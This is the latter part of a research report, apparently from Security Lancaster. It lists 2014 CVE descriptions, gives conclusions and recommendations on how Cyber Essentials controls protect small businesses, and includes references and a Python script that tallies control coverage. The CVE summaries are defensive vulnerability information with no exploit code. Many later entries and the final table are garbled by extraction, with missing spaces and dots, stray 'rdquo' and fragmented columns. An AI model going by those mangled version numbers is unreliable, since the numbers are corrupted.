CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory

corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo

CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo

CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo

CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo

CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo

CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document

CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28

an a3 01 5b ff byte sequence

CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication

CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate

CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo

CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors

CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork

CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL

CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message

CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction


Survey Responses


Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits could not be resolved by deploying security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. These additional measures would bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to provide evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on cyber-security issues and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and available patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note concerns the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes: minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The controls most used at present could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls, while patch management isn't necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that Anti-Malware is largely the only security tool that routinely scans network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
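To show how per-control proportions of the kind quoted above are derived from the Cyber Controls Applicability appendix, here is an added Python example; it is not code from the Security Lancaster report. It reads rows in the appendix table's layout (CVE id, five y/n applicability flags for SME 1 to 4 and the idealised SME, the "No CE" verdict and the "With CE" verdict naming the controls) and counts, among the CVEs that Cyber Essentials mitigates fully or partially, how often each control is named. The eight embedded rows are copied from that table; the pipe-separated layout, the folding of bracketed qualifiers such as "(Secure Browser)" into their parent control, and the function names are this example's own assumptions.

```python
"""Per-control mitigation coverage from rows of the Cyber Controls
Applicability table.

Added example, not code from the Security Lancaster report.  The row layout
follows the report's appendix table; the eight rows below are copied from it,
while the parsing rules and the names of the functions are assumptions of this
example.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

SME_COLUMNS = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")

# Rows copied from the report's applicability table (pipe-separated here).
SAMPLE_ROWS = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
"""


@dataclass
class Row:
    cve: str
    applies: dict                                   # column name -> affected?
    no_ce: str                                      # verdict without Cyber Essentials
    with_ce: str                                    # verdict with Cyber Essentials
    controls: list = field(default_factory=list)    # controls named in the With CE cell


def split_controls(cell):
    """'Mitigated - Patch Management & Firewall' -> ('Mitigated', ['Patch Management', 'Firewall']).

    Bracketed qualifiers such as '(Secure Browser)' are dropped (an assumption of
    this example) so that variants of one control are counted together."""
    verdict, _, rest = cell.partition(" - ")
    rest = re.sub(r"\s*\([^)]*\)", "", rest)
    names = [n.strip() for n in re.split(r",|&", rest) if n.strip()]
    return verdict.strip(), names


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 8 or not cells[0].startswith("CVE-"):
            raise ValueError(f"unexpected row layout: {line!r}")
        verdict, names = split_controls(cells[7])
        rows.append(Row(
            cve=cells[0],
            applies={col: flag.lower() == "y" for col, flag in zip(SME_COLUMNS, cells[1:6])},
            no_ce=cells[6],
            with_ce=verdict,
            controls=names,
        ))
    return rows


def verdict_counts(rows):
    """How many CVEs end up Mitigated / Partially Mitigated / Not Mitigated with CE."""
    return Counter(r.with_ce for r in rows)


def control_share(rows, include_partial=True):
    """Fraction of (partially) mitigated CVEs whose mitigation names each control."""
    ok = {"Mitigated"} | ({"Partially Mitigated"} if include_partial else set())
    mitigated = [r for r in rows if r.with_ce in ok]
    hits = Counter(name for r in mitigated for name in set(r.controls))
    return {name: hits[name] / len(mitigated) for name in hits}


def applicability_counts(rows):
    """How many of the CVEs affect software in use at each SME."""
    return {col: sum(r.applies[col] for r in rows) for col in SME_COLUMNS}


def unmitigated(rows):
    """CVEs that Cyber Essentials cannot mitigate: candidates for a 'do not install' list."""
    return [r.cve for r in rows if r.with_ce == "Not Mitigated"]


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for name, share in sorted(control_share(rows).items(), key=lambda kv: -kv[1]):
        print(f"{name:<22} {share:6.1%}")
    print("verdicts:", dict(verdict_counts(rows)))
    print("applicable per SME:", applicability_counts(rows))
    print("not mitigated:", unmitigated(rows))
```

The shares computed from these eight rows are of course not the report's figures, which rest on the full set of two hundred vulnerabilities; running the script over every appendix row reproduces the method, not just the sample. The `unmitigated` list is the set the Conclusions propose publishing as a blacklist, since the only "With CE" entry those rows carry is "Don't install".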

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyb

erC

ontr

ols

App

licab

ility

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-0

00

8y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(U

ser

Po

licy)

A

nti

-Mal

war

eC

VE

-20

13

-00

22

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-00

84

yy

yn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-0

14

0y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

14

9n

nn

nn

No

tM

